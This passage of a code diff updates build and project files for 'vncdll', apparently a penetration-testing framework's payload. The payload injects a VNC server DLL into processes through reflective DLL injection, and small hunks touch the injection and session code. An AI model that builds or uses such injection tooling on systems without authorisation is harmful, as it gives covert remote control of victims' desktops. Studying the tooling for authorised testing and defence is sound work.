DWORD dwTlsExpansionBitmapBits[32];
DWORD dwSessionId;
ULARGE_INTEGER liAppCompatFlags;
ULARGE_INTEGER liAppCompatFlagsUser;
LPVOID lppShimData;
LPVOID lpAppCompatInfo;
UNICODE_STR usCSDVersion;
LPVOID lpActivationContextData;
LPVOID lpProcessAssemblyStorageMap;
LPVOID lpSystemDefaultActivationContextData;
LPVOID lpSystemAssemblyStorageMap;
DWORD dwMinimumStackCommit;
} _PEB, * _PPEB;
typedef struct
{
WORD offset:12;
WORD type:4;
} IMAGE_RELOC, *PIMAGE_RELOC;
//===============================================================================================//
#endif
//===============================================================================================//

View File

@ -1,6 +0,0 @@
#ifdef _X64_
IDR_VNC_DLL IMG DISCARDABLE "../winvnc/x64/release/vnc.x64.dll"
#else
IDR_VNC_DLL IMG DISCARDABLE "../winvnc/release/vnc.dll"
#endif

View File

@ -1,437 +0,0 @@
<?xml version="1.0" encoding="Windows-1252"?>
<VisualStudioProject
ProjectType="Visual C++"
Version="9.00"
Name="loader"
ProjectGUID="{B00E0A6D-850E-47CF-A68F-C8C06DD69BAD}"
RootNamespace="loader"
Keyword="Win32Proj"
TargetFrameworkVersion="196613"
>
<Platforms>
<Platform
Name="Win32"
/>
<Platform
Name="x64"
/>
</Platforms>
<ToolFiles>
</ToolFiles>
<Configurations>
<Configuration
Name="Debug|Win32"
OutputDirectory="$(SolutionDir)$(ConfigurationName)"
IntermediateDirectory="$(ConfigurationName)"
ConfigurationType="2"
CharacterSet="1"
>
<Tool
Name="VCPreBuildEventTool"
/>
<Tool
Name="VCCustomBuildTool"
/>
<Tool
Name="VCXMLDataGeneratorTool"
/>
<Tool
Name="VCWebServiceProxyGeneratorTool"
/>
<Tool
Name="VCMIDLTool"
/>
<Tool
Name="VCCLCompilerTool"
Optimization="0"
PreprocessorDefinitions="WIN32;_DEBUG;_WINDOWS;_USRDLL;LOADER_EXPORTS;_CRT_SECURE_NO_WARNINGS"
MinimalRebuild="true"
BasicRuntimeChecks="3"
RuntimeLibrary="3"
UsePrecompiledHeader="0"
WarningLevel="3"
DebugInformationFormat="4"
/>
<Tool
Name="VCManagedResourceCompilerTool"
/>
<Tool
Name="VCResourceCompilerTool"
/>
<Tool
Name="VCPreLinkEventTool"
/>
<Tool
Name="VCLinkerTool"
LinkIncremental="2"
GenerateDebugInformation="true"
SubSystem="2"
TargetMachine="1"
/>
<Tool
Name="VCALinkTool"
/>
<Tool
Name="VCManifestTool"
/>
<Tool
Name="VCXDCMakeTool"
/>
<Tool
Name="VCBscMakeTool"
/>
<Tool
Name="VCFxCopTool"
/>
<Tool
Name="VCAppVerifierTool"
/>
<Tool
Name="VCPostBuildEventTool"
/>
</Configuration>
<Configuration
Name="Debug|x64"
OutputDirectory="$(SolutionDir)$(PlatformName)\$(ConfigurationName)"
IntermediateDirectory="$(PlatformName)\$(ConfigurationName)"
ConfigurationType="2"
CharacterSet="1"
>
<Tool
Name="VCPreBuildEventTool"
/>
<Tool
Name="VCCustomBuildTool"
/>
<Tool
Name="VCXMLDataGeneratorTool"
/>
<Tool
Name="VCWebServiceProxyGeneratorTool"
/>
<Tool
Name="VCMIDLTool"
TargetEnvironment="3"
/>
<Tool
Name="VCCLCompilerTool"
Optimization="0"
PreprocessorDefinitions="WIN32;_DEBUG;_WINDOWS;_USRDLL;LOADER_EXPORTS"
MinimalRebuild="true"
BasicRuntimeChecks="3"
RuntimeLibrary="3"
UsePrecompiledHeader="0"
WarningLevel="3"
DebugInformationFormat="3"
/>
<Tool
Name="VCManagedResourceCompilerTool"
/>
<Tool
Name="VCResourceCompilerTool"
/>
<Tool
Name="VCPreLinkEventTool"
/>
<Tool
Name="VCLinkerTool"
LinkIncremental="2"
GenerateDebugInformation="true"
SubSystem="2"
TargetMachine="17"
/>
<Tool
Name="VCALinkTool"
/>
<Tool
Name="VCManifestTool"
/>
<Tool
Name="VCXDCMakeTool"
/>
<Tool
Name="VCBscMakeTool"
/>
<Tool
Name="VCFxCopTool"
/>
<Tool
Name="VCAppVerifierTool"
/>
<Tool
Name="VCPostBuildEventTool"
/>
</Configuration>
<Configuration
Name="Release|Win32"
OutputDirectory="$(SolutionDir)$(ConfigurationName)"
IntermediateDirectory="$(ConfigurationName)"
ConfigurationType="2"
UseOfMFC="1"
CharacterSet="2"
WholeProgramOptimization="1"
>
<Tool
Name="VCPreBuildEventTool"
/>
<Tool
Name="VCCustomBuildTool"
/>
<Tool
Name="VCXMLDataGeneratorTool"
/>
<Tool
Name="VCWebServiceProxyGeneratorTool"
/>
<Tool
Name="VCMIDLTool"
/>
<Tool
Name="VCCLCompilerTool"
Optimization="2"
EnableIntrinsicFunctions="true"
PreprocessorDefinitions="WIN32;NDEBUG;_WINDOWS;_USRDLL;LOADER_EXPORTS;_CRT_SECURE_NO_WARNINGS"
RuntimeLibrary="0"
EnableFunctionLevelLinking="true"
UsePrecompiledHeader="0"
WarningLevel="3"
DebugInformationFormat="3"
CompileAs="1"
/>
<Tool
Name="VCManagedResourceCompilerTool"
/>
<Tool
Name="VCResourceCompilerTool"
PreprocessorDefinitions="_X86_"
/>
<Tool
Name="VCPreLinkEventTool"
/>
<Tool
Name="VCLinkerTool"
AdditionalDependencies="Advapi32.lib ws2_32.lib User32.lib"
OutputFile="release\vncdll.dll"
LinkIncremental="1"
GenerateManifest="false"
GenerateDebugInformation="false"
SubSystem="2"
OptimizeReferences="2"
EnableCOMDATFolding="2"
RandomizedBaseAddress="1"
DataExecutionPrevention="1"
TargetMachine="1"
/>
<Tool
Name="VCALinkTool"
/>
<Tool
Name="VCManifestTool"
/>
<Tool
Name="VCXDCMakeTool"
/>
<Tool
Name="VCBscMakeTool"
/>
<Tool
Name="VCFxCopTool"
/>
<Tool
Name="VCAppVerifierTool"
/>
<Tool
Name="VCPostBuildEventTool"
CommandLine="copy /y &quot;release\vncdll.dll&quot; &quot;..\output\&quot;"
/>
</Configuration>
<Configuration
Name="Release|x64"
OutputDirectory="$(SolutionDir)$(PlatformName)\$(ConfigurationName)"
IntermediateDirectory="$(PlatformName)\$(ConfigurationName)"
ConfigurationType="2"
UseOfMFC="1"
CharacterSet="2"
WholeProgramOptimization="1"
>
<Tool
Name="VCPreBuildEventTool"
/>
<Tool
Name="VCCustomBuildTool"
/>
<Tool
Name="VCXMLDataGeneratorTool"
/>
<Tool
Name="VCWebServiceProxyGeneratorTool"
/>
<Tool
Name="VCMIDLTool"
TargetEnvironment="3"
/>
<Tool
Name="VCCLCompilerTool"
Optimization="2"
EnableIntrinsicFunctions="true"
PreprocessorDefinitions="WIN32;NDEBUG;_WINDOWS;_USRDLL;LOADER_EXPORTS;_CRT_SECURE_NO_WARNINGS"
RuntimeLibrary="0"
EnableFunctionLevelLinking="true"
UsePrecompiledHeader="0"
WarningLevel="3"
DebugInformationFormat="3"
CompileAs="1"
/>
<Tool
Name="VCManagedResourceCompilerTool"
/>
<Tool
Name="VCResourceCompilerTool"
PreprocessorDefinitions="_X64_"
/>
<Tool
Name="VCPreLinkEventTool"
/>
<Tool
Name="VCLinkerTool"
AdditionalDependencies="Advapi32.lib ws2_32.lib User32.lib"
OutputFile="release\vncdll.x64.dll"
LinkIncremental="1"
GenerateManifest="false"
GenerateDebugInformation="false"
SubSystem="2"
OptimizeReferences="2"
EnableCOMDATFolding="2"
RandomizedBaseAddress="1"
DataExecutionPrevention="1"
TargetMachine="17"
/>
<Tool
Name="VCALinkTool"
/>
<Tool
Name="VCManifestTool"
/>
<Tool
Name="VCXDCMakeTool"
/>
<Tool
Name="VCBscMakeTool"
/>
<Tool
Name="VCFxCopTool"
/>
<Tool
Name="VCAppVerifierTool"
/>
<Tool
Name="VCPostBuildEventTool"
CommandLine="copy /y &quot;release\vncdll.x64.dll&quot; &quot;..\output\&quot;"
/>
</Configuration>
</Configurations>
<References>
</References>
<Files>
<Filter
Name="Source Files"
Filter="cpp;c;cc;cxx;def;odl;idl;hpj;bat;asm;asmx"
UniqueIdentifier="{4FC737F1-C7A5-4376-A066-2A32D752A2FF}"
>
<File
RelativePath=".\context.c"
>
</File>
<File
RelativePath=".\loader.c"
>
</File>
<Filter
Name="rdi"
>
<File
RelativePath=".\LoadLibraryR.c"
>
</File>
<File
RelativePath=".\ReflectiveLoader.c"
>
</File>
</Filter>
<Filter
Name="core"
>
<File
RelativePath=".\inject.c"
>
</File>
<File
RelativePath=".\ps.c"
>
</File>
<File
RelativePath=".\session.c"
>
</File>
</Filter>
</Filter>
<Filter
Name="Header Files"
Filter="h;hpp;hxx;hm;inl;inc;xsd"
UniqueIdentifier="{93995380-89BD-4b04-88EB-625FBE52EBFB}"
>
<File
RelativePath=".\context.h"
>
</File>
<File
RelativePath=".\loader.h"
>
</File>
<Filter
Name="rdi"
>
<File
RelativePath=".\LoadLibraryR.h"
>
</File>
<File
RelativePath=".\ReflectiveDLLInjection.h"
>
</File>
<File
RelativePath=".\ReflectiveLoader.h"
>
</File>
</Filter>
<Filter
Name="core"
>
<File
RelativePath=".\inject.h"
>
</File>
<File
RelativePath=".\ps.h"
>
</File>
<File
RelativePath=".\session.h"
>
</File>
</Filter>
</Filter>
<Filter
Name="Resource Files"
Filter="rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav"
UniqueIdentifier="{67DA6AB6-F800-4c08-8B7A-83BB121AAD01}"
>
<File
RelativePath=".\loader.rc"
>
</File>
</Filter>
</Files>
<Globals>
</Globals>
</VisualStudioProject>

32
external/source/vncdll/make.bat vendored Executable file
View File

@ -0,0 +1,32 @@
@ECHO OFF
IF "%VCINSTALLDIR%" == "" GOTO NEED_VS
IF "%1"=="x86" GOTO BUILD_X86
IF "%1"=="X64" GOTO BUILD_X64
ECHO "Building VNCDLL x64 and x86 (Release)"
SET PLAT=all
GOTO RUN
:BUILD_X86
ECHO "Building VNCDLL x86 (Release)"
SET PLAT=x86
GOTO RUN
:BUILD_X64
ECHO "Building VNCDLL x64 (Release)"
SET PLAT=x64
GOTO RUN
:RUN
PUSHD workspace
msbuild.exe make.msbuild /target:%PLAT%
POPD
GOTO :END
:NEED_VS
ECHO "This command must be executed from within a Visual Studio Command prompt."
ECHO "This can be found under Microsoft Visual Studio 2013 -> Visual Studio Tools"
:END

19
external/source/vncdll/make.msbuild vendored Executable file
View File

@ -0,0 +1,19 @@
<?xml version="1.0" standalone="yes"?>
<Project xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
<PropertyGroup>
<SolutionPath>.\vncdll.sln</SolutionPath>
</PropertyGroup>
<Target Name="all" DependsOnTargets="x86;x64" />
<Target Name="x86">
<Message Text="Building VNCDLL x86 Release version" />
<MSBuild Projects="$(SolutionPath)" Properties="Configuration=Release;Platform=Win32" Targets="Clean;Rebuild"/>
</Target>
<Target Name="x64">
<Message Text="Building VNCDLL x64 Release version" />
<MSBuild Projects="$(SolutionPath)" Properties="Configuration=Release;Platform=x64" Targets="Clean;Rebuild"/>
</Target>
</Project>

Binary file not shown.

Binary file not shown.

View File

@ -1,11 +1,10 @@
Microsoft Visual Studio Solution File, Format Version 10.00 Microsoft Visual Studio Solution File, Format Version 12.00
# Visual C++ Express 2008 # Visual Studio 2013
Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "winvnc", "WinVNC.vcproj", "{EA6A09AC-04BB-423D-8842-CA48DF901058}" VisualStudioVersion = 12.0.21005.1
MinimumVisualStudioVersion = 10.0.40219.1
Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "winvnc", "winvnc\WinVNC.vcxproj", "{EA6A09AC-04BB-423D-8842-CA48DF901058}"
EndProject EndProject
Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "loader", "..\loader\loader.vcproj", "{B00E0A6D-850E-47CF-A68F-C8C06DD69BAD}" Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "vncdll", "vncdll\vncdll.vcxproj", "{B00E0A6D-850E-47CF-A68F-C8C06DD69BAD}"
ProjectSection(ProjectDependencies) = postProject
{EA6A09AC-04BB-423D-8842-CA48DF901058} = {EA6A09AC-04BB-423D-8842-CA48DF901058}
EndProjectSection
EndProject EndProject
Global Global
GlobalSection(SolutionConfigurationPlatforms) = preSolution GlobalSection(SolutionConfigurationPlatforms) = preSolution
@ -15,19 +14,22 @@ Global
Release|x64 = Release|x64 Release|x64 = Release|x64
EndGlobalSection EndGlobalSection
GlobalSection(ProjectConfigurationPlatforms) = postSolution GlobalSection(ProjectConfigurationPlatforms) = postSolution
{B00E0A6D-850E-47CF-A68F-C8C06DD69BAD}.Debug|Win32.ActiveCfg = Debug|Win32
{B00E0A6D-850E-47CF-A68F-C8C06DD69BAD}.Debug|Win32.Build.0 = Debug|Win32
{B00E0A6D-850E-47CF-A68F-C8C06DD69BAD}.Debug|x64.ActiveCfg = Debug|x64
{B00E0A6D-850E-47CF-A68F-C8C06DD69BAD}.Debug|x64.Build.0 = Debug|x64
{B00E0A6D-850E-47CF-A68F-C8C06DD69BAD}.Release|Win32.ActiveCfg = Release|Win32
{B00E0A6D-850E-47CF-A68F-C8C06DD69BAD}.Release|Win32.Build.0 = Release|Win32
{B00E0A6D-850E-47CF-A68F-C8C06DD69BAD}.Release|x64.ActiveCfg = Release|x64
{B00E0A6D-850E-47CF-A68F-C8C06DD69BAD}.Release|x64.Build.0 = Release|x64
{EA6A09AC-04BB-423D-8842-CA48DF901058}.Debug|Win32.ActiveCfg = Debug|Win32 {EA6A09AC-04BB-423D-8842-CA48DF901058}.Debug|Win32.ActiveCfg = Debug|Win32
{EA6A09AC-04BB-423D-8842-CA48DF901058}.Debug|Win32.Build.0 = Debug|Win32 {EA6A09AC-04BB-423D-8842-CA48DF901058}.Debug|Win32.Build.0 = Debug|Win32
{EA6A09AC-04BB-423D-8842-CA48DF901058}.Debug|x64.ActiveCfg = Debug|Win32 {EA6A09AC-04BB-423D-8842-CA48DF901058}.Debug|x64.ActiveCfg = Debug|x64
{EA6A09AC-04BB-423D-8842-CA48DF901058}.Debug|x64.Build.0 = Debug|x64
{EA6A09AC-04BB-423D-8842-CA48DF901058}.Release|Win32.ActiveCfg = Release|Win32 {EA6A09AC-04BB-423D-8842-CA48DF901058}.Release|Win32.ActiveCfg = Release|Win32
{EA6A09AC-04BB-423D-8842-CA48DF901058}.Release|Win32.Build.0 = Release|Win32 {EA6A09AC-04BB-423D-8842-CA48DF901058}.Release|Win32.Build.0 = Release|Win32
{EA6A09AC-04BB-423D-8842-CA48DF901058}.Release|x64.ActiveCfg = Release|x64 {EA6A09AC-04BB-423D-8842-CA48DF901058}.Release|x64.ActiveCfg = Release|x64
{EA6A09AC-04BB-423D-8842-CA48DF901058}.Release|x64.Build.0 = Release|x64 {EA6A09AC-04BB-423D-8842-CA48DF901058}.Release|x64.Build.0 = Release|x64
{B00E0A6D-850E-47CF-A68F-C8C06DD69BAD}.Debug|Win32.ActiveCfg = Debug|Win32
{B00E0A6D-850E-47CF-A68F-C8C06DD69BAD}.Debug|Win32.Build.0 = Debug|Win32
{B00E0A6D-850E-47CF-A68F-C8C06DD69BAD}.Debug|x64.ActiveCfg = Debug|Win32
{B00E0A6D-850E-47CF-A68F-C8C06DD69BAD}.Release|Win32.ActiveCfg = Release|Win32
{B00E0A6D-850E-47CF-A68F-C8C06DD69BAD}.Release|Win32.Build.0 = Release|Win32
{B00E0A6D-850E-47CF-A68F-C8C06DD69BAD}.Release|x64.ActiveCfg = Release|x64
EndGlobalSection EndGlobalSection
GlobalSection(SolutionProperties) = preSolution GlobalSection(SolutionProperties) = preSolution
HideSolutionNode = FALSE HideSolutionNode = FALSE

View File

@ -76,7 +76,7 @@ DWORD WINAPI context_message_thread( LPVOID lpParameter )
{ {
do do
{ {
_snprintf( cNamedPipe, MAX_PATH, "\\\\.\\pipe\\%08X", AgentContext.dwPipeName ); _snprintf_s( cNamedPipe, MAX_PATH, MAX_PATH - 1, "\\\\.\\pipe\\%08X", AgentContext.dwPipeName );
dprintf("[LOADER] loader_message_thread. cNamedPipe=%s", cNamedPipe ); dprintf("[LOADER] loader_message_thread. cNamedPipe=%s", cNamedPipe );

View File

@ -1,7 +1,7 @@
#include "loader.h" #include "loader.h"
#include "ps.h" #include "ps.h"
#include "inject.h" #include "inject.h"
#include "LoadLibraryR.h" #include "../../ReflectiveDLLInjection/inject/src/LoadLibraryR.h"
#include <Tlhelp32.h> #include <Tlhelp32.h>
// Simple trick to get the current meterpreters arch // Simple trick to get the current meterpreters arch

View File

@ -5,11 +5,12 @@
#include "ps.h" #include "ps.h"
#include "session.h" #include "session.h"
#include "inject.h" #include "inject.h"
#include "ReflectiveLoader.h"
#define VNCFLAG_DISABLECOURTESYSHELL 1 #define VNCFLAG_DISABLECOURTESYSHELL 1
#define VNCFLAG_DISABLESESSIONTRACKING 2 #define VNCFLAG_DISABLESESSIONTRACKING 2
#include "../../ReflectiveDLLInjection/dll/src/ReflectiveLoader.c"
/* /*
* The HINSTANCE of this injected dll. * The HINSTANCE of this injected dll.
*/ */
@ -173,7 +174,7 @@ DWORD loader_inject_pre( DWORD dwPid, HANDLE hProcess, char * cpCommandLine )
hAgentProcess = hProcess; hAgentProcess = hProcess;
_snprintf( cpCommandLine, COMMANDLINE_LENGTH, "/v /c:0x%08X", lpMemory ); _snprintf_s( cpCommandLine, COMMANDLINE_LENGTH, COMMANDLINE_LENGTH - 1, "/v /c:0x%08p", lpMemory );
} while( 0 ); } while( 0 );

18
external/source/vncdll/vncdll/loader.rc vendored Executable file
View File

@ -0,0 +1,18 @@
#ifdef _X64_
#ifdef _DEBUG
IDR_VNC_DLL IMG DISCARDABLE "..\\winvnc\\Debug\\x64\\winvnc.x64.dll"
#else
IDR_VNC_DLL IMG DISCARDABLE "..\\winvnc\\Release\\x64\\winvnc.x64.dll"
#endif
#else
#ifdef _DEBUG
IDR_VNC_DLL IMG DISCARDABLE "..\\winvnc\\Debug\\Win32\\winvnc.x86.dll"
#else
IDR_VNC_DLL IMG DISCARDABLE "..\\winvnc\\Release\\Win32\\winvnc.x86.dll"
#endif
#endif

View File

@ -18,7 +18,7 @@ DWORD session_id( DWORD dwProcessId )
{ {
if( !pProcessIdToSessionId ) if( !pProcessIdToSessionId )
{ {
hKernel = LoadLibrary( "kernel32.dll" ); hKernel = LoadLibraryA( "kernel32.dll" );
if( hKernel ) if( hKernel )
pProcessIdToSessionId = (PROCESSIDTOSESSIONID)GetProcAddress( hKernel, "ProcessIdToSessionId" ); pProcessIdToSessionId = (PROCESSIDTOSESSIONID)GetProcAddress( hKernel, "ProcessIdToSessionId" );
} }
@ -53,7 +53,7 @@ DWORD session_activeid()
{ {
if( !pWTSGetActiveConsoleSessionId ) if( !pWTSGetActiveConsoleSessionId )
{ {
hKernel = LoadLibrary( "kernel32.dll" ); hKernel = LoadLibraryA( "kernel32.dll" );
if( hKernel ) if( hKernel )
pWTSGetActiveConsoleSessionId = (WTSGETACTIVECONSOLESESSIONID)GetProcAddress( hKernel, "WTSGetActiveConsoleSessionId" ); pWTSGetActiveConsoleSessionId = (WTSGETACTIVECONSOLESESSIONID)GetProcAddress( hKernel, "WTSGetActiveConsoleSessionId" );
} }
@ -141,7 +141,7 @@ DWORD session_inject( DWORD dwSessionId, DLL_BUFFER * pDllBuffer )
CloseHandle( hToken ); CloseHandle( hToken );
} }
hKernel = LoadLibrary( "kernel32" ); hKernel = LoadLibraryA( "kernel32" );
if( !hKernel ) if( !hKernel )
break; break;

245
external/source/vncdll/vncdll/vncdll.vcxproj vendored Executable file
View File

@ -0,0 +1,245 @@
<?xml version="1.0" encoding="utf-8"?>
<Project DefaultTargets="Build" ToolsVersion="12.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
<ItemGroup Label="ProjectConfigurations">
<ProjectConfiguration Include="Debug|Win32">
<Configuration>Debug</Configuration>
<Platform>Win32</Platform>
</ProjectConfiguration>
<ProjectConfiguration Include="Debug|x64">
<Configuration>Debug</Configuration>
<Platform>x64</Platform>
</ProjectConfiguration>
<ProjectConfiguration Include="Release|Win32">
<Configuration>Release</Configuration>
<Platform>Win32</Platform>
</ProjectConfiguration>
<ProjectConfiguration Include="Release|x64">
<Configuration>Release</Configuration>
<Platform>x64</Platform>
</ProjectConfiguration>
</ItemGroup>
<PropertyGroup Label="Globals">
<ProjectGuid>{B00E0A6D-850E-47CF-A68F-C8C06DD69BAD}</ProjectGuid>
<RootNamespace>vncdll</RootNamespace>
<Keyword>Win32Proj</Keyword>
</PropertyGroup>
<Import Project="$(VCTargetsPath)\Microsoft.Cpp.Default.props" />
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'" Label="Configuration">
<ConfigurationType>DynamicLibrary</ConfigurationType>
<PlatformToolset>v120_xp</PlatformToolset>
<UseOfMfc>false</UseOfMfc>
<CharacterSet>MultiByte</CharacterSet>
<WholeProgramOptimization>true</WholeProgramOptimization>
</PropertyGroup>
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'" Label="Configuration">
<ConfigurationType>DynamicLibrary</ConfigurationType>
<PlatformToolset>v120_xp</PlatformToolset>
<CharacterSet>MultiByte</CharacterSet>
</PropertyGroup>
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'" Label="Configuration">
<ConfigurationType>DynamicLibrary</ConfigurationType>
<PlatformToolset>v120_xp</PlatformToolset>
<UseOfMfc>false</UseOfMfc>
<CharacterSet>MultiByte</CharacterSet>
<WholeProgramOptimization>true</WholeProgramOptimization>
</PropertyGroup>
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'" Label="Configuration">
<ConfigurationType>DynamicLibrary</ConfigurationType>
<PlatformToolset>v120_xp</PlatformToolset>
<CharacterSet>MultiByte</CharacterSet>
</PropertyGroup>
<Import Project="$(VCTargetsPath)\Microsoft.Cpp.props" />
<ImportGroup Label="ExtensionSettings">
</ImportGroup>
<ImportGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'" Label="PropertySheets">
<Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
</ImportGroup>
<ImportGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'" Label="PropertySheets">
<Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
</ImportGroup>
<ImportGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'" Label="PropertySheets">
<Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
</ImportGroup>
<ImportGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'" Label="PropertySheets">
<Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
</ImportGroup>
<PropertyGroup Label="UserMacros" />
<PropertyGroup>
<_ProjectFileVersion>12.0.21005.1</_ProjectFileVersion>
</PropertyGroup>
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">
<OutDir>$(ProjectDir)$(Configuration)\$(Platform)\</OutDir>
<IntDir>$(ProjectDir)$(Configuration)\$(Platform)\</IntDir>
<LinkIncremental>true</LinkIncremental>
<TargetName>$(ProjectName).$(PlatformShortName)</TargetName>
</PropertyGroup>
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">
<OutDir>$(ProjectDir)$(Configuration)\$(Platform)\</OutDir>
<IntDir>$(ProjectDir)$(Configuration)\$(Platform)\</IntDir>
<LinkIncremental>true</LinkIncremental>
<TargetName>$(ProjectName).$(PlatformShortName)</TargetName>
</PropertyGroup>
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
<OutDir>$(ProjectDir)$(Configuration)\$(Platform)\</OutDir>
<IntDir>$(ProjectDir)$(Configuration)\$(Platform)\</IntDir>
<LinkIncremental>false</LinkIncremental>
<GenerateManifest>false</GenerateManifest>
<TargetName>$(ProjectName).$(PlatformShortName)</TargetName>
</PropertyGroup>
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'">
<OutDir>$(ProjectDir)$(Configuration)\$(Platform)\</OutDir>
<IntDir>$(ProjectDir)$(Configuration)\$(Platform)\</IntDir>
<LinkIncremental>false</LinkIncremental>
<GenerateManifest>false</GenerateManifest>
<TargetName>$(ProjectName).$(PlatformShortName)</TargetName>
</PropertyGroup>
<ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">
<ClCompile>
<Optimization>Disabled</Optimization>
<PreprocessorDefinitions>WIN32;WIN_X86;_DEBUG;_WINDOWS;_USRDLL;LOADER_EXPORTS;%(PreprocessorDefinitions)</PreprocessorDefinitions>
<AdditionalIncludeDirectories>..\..\ReflectiveDLLInjection\common;%(AdditionalIncludeDirectories)</AdditionalIncludeDirectories>
<MinimalRebuild>true</MinimalRebuild>
<BasicRuntimeChecks>EnableFastChecks</BasicRuntimeChecks>
<RuntimeLibrary>MultiThreadedDebugDLL</RuntimeLibrary>
<PrecompiledHeader />
<WarningLevel>Level3</WarningLevel>
<DebugInformationFormat>EditAndContinue</DebugInformationFormat>
</ClCompile>
<Link>
<GenerateDebugInformation>true</GenerateDebugInformation>
<SubSystem>Windows</SubSystem>
<TargetMachine>MachineX86</TargetMachine>
<AdditionalDependencies>Advapi32.lib;ws2_32.lib;User32.lib;%(AdditionalDependencies)</AdditionalDependencies>
</Link>
<ResourceCompile>
<PreprocessorDefinitions>_DEBUG;_USING_V110_SDK71_;%(PreprocessorDefinitions)</PreprocessorDefinitions>
</ResourceCompile>
<PostBuildEvent>
<Command>editbin.exe /OSVERSION:5.0 /SUBSYSTEM:WINDOWS,4.0 "$(TargetDir)$(TargetFileName)" &gt; NUL
exit 0</Command>
</PostBuildEvent>
</ItemDefinitionGroup>
<ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">
<Midl>
<TargetEnvironment>X64</TargetEnvironment>
</Midl>
<ClCompile>
<Optimization>Disabled</Optimization>
<PreprocessorDefinitions>WIN32;_DEBUG;_WINDOWS;_USRDLL;LOADER_EXPORTS;%(PreprocessorDefinitions)</PreprocessorDefinitions>
<AdditionalIncludeDirectories>..\..\ReflectiveDLLInjection\common;%(AdditionalIncludeDirectories)</AdditionalIncludeDirectories>
<MinimalRebuild>true</MinimalRebuild>
<BasicRuntimeChecks>EnableFastChecks</BasicRuntimeChecks>
<RuntimeLibrary>MultiThreadedDebugDLL</RuntimeLibrary>
<PrecompiledHeader />
<WarningLevel>Level3</WarningLevel>
<DebugInformationFormat>ProgramDatabase</DebugInformationFormat>
</ClCompile>
<Link>
<GenerateDebugInformation>true</GenerateDebugInformation>
<SubSystem>Windows</SubSystem>
<TargetMachine>MachineX64</TargetMachine>
<AdditionalDependencies>Advapi32.lib;ws2_32.lib;User32.lib;%(AdditionalDependencies)</AdditionalDependencies>
</Link>
<ResourceCompile>
<PreprocessorDefinitions>_X64_;_DEBUG;_USING_V110_SDK71_;%(PreprocessorDefinitions)</PreprocessorDefinitions>
</ResourceCompile>
<PostBuildEvent>
<Command>editbin.exe /OSVERSION:5.0 /SUBSYSTEM:WINDOWS,5.1 "$(TargetDir)$(TargetFileName)" &gt; NUL
exit 0</Command>
</PostBuildEvent>
</ItemDefinitionGroup>
<ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
<ClCompile>
<Optimization>MaxSpeed</Optimization>
<IntrinsicFunctions>true</IntrinsicFunctions>
<PreprocessorDefinitions>WIN32;WIN_X86;NDEBUG;_WINDOWS;_USRDLL;LOADER_EXPORTS;%(PreprocessorDefinitions)</PreprocessorDefinitions>
<AdditionalIncludeDirectories>..\..\ReflectiveDLLInjection\common;%(AdditionalIncludeDirectories)</AdditionalIncludeDirectories>
<RuntimeLibrary>MultiThreaded</RuntimeLibrary>
<FunctionLevelLinking>true</FunctionLevelLinking>
<PrecompiledHeader />
<WarningLevel>Level3</WarningLevel>
<DebugInformationFormat>ProgramDatabase</DebugInformationFormat>
<CompileAs>CompileAsC</CompileAs>
</ClCompile>
<ResourceCompile>
<PreprocessorDefinitions>_USING_V110_SDK71_;%(PreprocessorDefinitions)</PreprocessorDefinitions>
</ResourceCompile>
<Link>
<AdditionalDependencies>Advapi32.lib;ws2_32.lib;User32.lib;%(AdditionalDependencies)</AdditionalDependencies>
<OutputFile>$(OutDir)$(TargetName)$(TargetExt)</OutputFile>
<GenerateDebugInformation>false</GenerateDebugInformation>
<SubSystem>Windows</SubSystem>
<OptimizeReferences>true</OptimizeReferences>
<EnableCOMDATFolding>true</EnableCOMDATFolding>
<RandomizedBaseAddress>false</RandomizedBaseAddress>
<DataExecutionPrevention>false</DataExecutionPrevention>
<TargetMachine>MachineX86</TargetMachine>
</Link>
<PostBuildEvent>
<Command>editbin.exe /OSVERSION:5.0 /SUBSYSTEM:WINDOWS,4.0 "$(TargetDir)$(TargetFileName)" &gt; NUL
copy /y "$(TargetDir)$(TargetFileName)" "..\..\..\..\data\"</Command>
</PostBuildEvent>
</ItemDefinitionGroup>
<ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'">
<Midl>
<TargetEnvironment>X64</TargetEnvironment>
</Midl>
<ClCompile>
<Optimization>MaxSpeed</Optimization>
<IntrinsicFunctions>true</IntrinsicFunctions>
